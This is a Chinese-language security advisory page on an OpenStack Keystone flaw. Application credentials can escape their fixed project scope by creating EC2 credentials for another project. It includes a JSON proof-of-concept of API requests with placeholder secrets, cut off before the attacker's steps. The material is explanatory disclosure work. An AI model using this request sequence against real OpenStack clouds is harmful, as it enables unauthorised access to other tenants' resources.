OpenStack Keystone EC2凭证越权访问项目范围漏洞

漏洞概述 漏洞名称: Generic EC2 credential creation allows application credentials to escape fixed project scope via /v3/ec2tokens 漏洞描述: 在OpenStack Identity (keystone)中，存在一个漏洞，允许攻击者通过 端点创建的应用程序凭证（application credentials）绕过固定的项目范围限制。具体来说，攻击者可以利用一个合法绑定到项目A的应用程序凭证，创建一个EC2凭证，该凭证的 被设置为项目B。随后，攻击者可以使用这个EC2凭证获取一个项目B的Keystone令牌，从而访问项目B的资源。 影响范围 受影响组件: OpenStack Identity (keystone) 影响级别: 高 影响用户: 所有使用OpenStack Identity (keystone) 的用户，特别是那些依赖应用程序凭证进行身份验证的用户。 修复方案 修复状态: 已修复 修复版本: Fix Released 修复补丁: 页面中提到了一个补丁文件 ，但具体补丁内容未提供。 POC代码 以下是页面中提供的POC代码： ```json { "scenario_id": "project_escape", "attacker_description": "External attacker holding a stolen application credential. This attacker does not need their own Keystone user account.", "victim_user_id": "c9723c22f8f24599950b8aef08993259", "victim_username": "victim-user", "victim_password": "VictimPassword123!", "victim_project_role_id": "eb311aea24e6d4de49c119ca3a35de921", "victim_project_role_name": "admin", "project_a_id": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "project_a_name": "victim-project-a", "project_b_id": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", "project_b_name": "victim-project-b", "requested_service_admin_user_id": "22222222222222222222222222222222", "service_admin_username": "service-admin-user", "service_admin_password": "ServiceAdminPassword123!", "service_admin_role_id": "eb311aea24e6d4de49c119ca3a35de921", "service_admin_role_name": "admin", "application_credential_id": "821667550fef1d4bff2da212689c8f8d5f", "application_credential_secret": "h30k8t5fe1d4bff2da212689c8f8d5f", "ec2_access_key": "kfnd6-ec2-access-key", "ec2_secret_key": "kfnd6-ec2-secret-key", "ec2_credential_id": "f891854a6347fc2f9e9670be347f8fcbee417152eacaae680557b45f1d65de73a50", "exploit_starts_at_step": 6, "result": { "direct_app_credential_project_id": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "direct_app_credential_project_name": "victim-project-a", "generic_ec2_credential_project_id": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", "generic_ec2_credential_project_name": "victim-project-b", "exchanged_token_project_id": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", "exchanged_token_project_name": "victim-project-b", "exchanged_token_cred_id": "821667550fef1d4bff2da212689c8f8d5f" }, "steps": [ { "description": "Victim logs in normally to get a password-based token scoped to project A.", "actor": "victim_user", "request": { "method": "POST", "path": "/v3/auth/tokens", "headers": [], "body": { "auth": { "identity": { "methods": [ "password" ], "password": { "user": { "id": "c9723c22f8f24599950b8aef08993259", "name": "victim-user", "domain": { "id": "d8ac70eba7db428a81b2ff72f1fa7130", "name": "default" } }, "password": "VictimPassword123!" } }, "scope": { "project": { "id": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" } } } } }, "response": { "status": 201, "headers": [], "body": { "token": { "methods": [ "password" ], "user": { "domain": { "id": "d8ac70eba7db428a81b2ff72f1fa7130", "name": "default" }, "id": "c9723c22f8f24599950b8aef08993259", "name": "victim-user" }, "audit_ids": [ "WycCQmN5AMDH7-h6oKFA" ], "expires_at": "2026-04-21T06:39:18.000002Z", "issued_at": "2026-04-21T05:39:18.000002Z", "project": { "domain": { "id": "d8ac70eba7db428a81b2ff72f1fa7130", "name": "default" }, "id": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "name": "victim-project-a" }, "is_domain": false, "roles": [ { "id": "eb311aea24e6d4de49c119ca3a35de921", "name": "admin" } ], "catalog": [ { "endpoints": [ { "name": "21628737f8d44aaaaabaa8342b4a9604", "description": "Fad65c7480b414994e4f9ad7f08246", "id": "5a9c30b2cb4bd4ac3ad78979310b6d0a", "interface": "public", "region": "0c6d438b10534ae7b122c9e47a8a1ed0", "url": "https://keystone:37f381a63c3211a9b21a9f2d694f3c.com", "region_id": "0c6d438b10534ae7b122c9e47a8a1ed0" }, { "id": "819b5433093fa1a1ac9c89d64d28b73e", "type": "identity", "name": "82166d6c8c63b3646990d1fb497ebdac20" } ] } ] } } } }, { "description": "Victim creates an application credential that is legitimately bound to project A.", "actor": "victim_user", "request": { "method": "POST", "path": "/v3/users/c9723c22f8f24599950b8aef08993259/application_credentials", "headers": [ { "X-Auth-Token": "gAAAAABp5wZC...0M0zD50XM6o" } ], "body": { "application_credential": { "name": "victim-project-a-app-credential", "roles": [ { "id": "eb311aea24e6d4de49c119ca3a35de921" } ] } } }, "response": { "status": 201, "headers": [], "body": { "application_credential": { "id": "821667550fef1d4bff2da212689c8f8d5f", "name": "victim-project-a-app-credential", "description": null, "user_id": "c9723c22f8f24599950b8aef08993259", "project_id": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "system": null, "expires_at": null, "unrestricted": null, "roles": [ { "id": "eb311aea24e6d4de49c119ca3a35de921", "name": "admin", "domain_id": null, "description": "379960f9ff9c6458791289f184e254ed7", "options": {} } ], "secret": "h30k8t5fe1d4bff2da212689c8f8d5f", "links": { "self": "http://localhost/v3/application_credentials/821667550fef1d4bff2da212689c8f8d5f" } } } } }, { "description": "Attacker uses the stol

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

OpenStack Keystone EC2凭证越权访问项目范围漏洞

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

OpenStack Keystone EC2凭证越权访问项目范围漏洞

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！